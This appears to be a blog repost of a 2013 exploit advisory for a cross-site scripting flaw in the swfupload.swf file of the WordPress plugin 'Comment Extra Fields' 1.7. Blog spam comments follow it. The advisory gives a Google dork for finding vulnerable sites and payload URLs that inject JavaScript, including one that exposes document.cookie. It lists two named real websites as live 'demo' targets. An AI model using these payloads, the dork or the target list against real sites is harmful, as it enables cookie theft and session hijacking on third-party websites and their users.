Wordpress Plugins - Comment Extra Fields <== XSS
##################################################
# Description : Wordpress Plugins - Comment Extra Fields <== XSS
# Version : 1.7
# Link : http://wordpress.org/extend/plugins/comment-extra-field/
# Plugins : http://downloads.wordpress.org/plugin/comment-extra-field.1.7.zip
# Date : 8-1-2013
# Google Dork : inurl:/wp-content/plugins/comment-extra-field/
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################
# Description :
================
JavaScript Code injecton (XSRF/XSS) .
remote attacker can include a remote Images or exec some JS code.
# PoC
=====
=> XSRF/XSS Injection :
http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('XSS');//
http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
# Demo:
=======
http://cscmail.net/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
http://fitest.sitewalla.com/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
# Thanks
=========
CyberSEC Team - TBD - 1337day - PacketStormSecurity
nice article.
ReplyDeletedigital photography retouching
You made such an interesting piece to read, giving every subject enlightenment for us to gain knowledge. Thanks for sharing the such information with us to read this... Urdu inpage 2009 download
ReplyDelete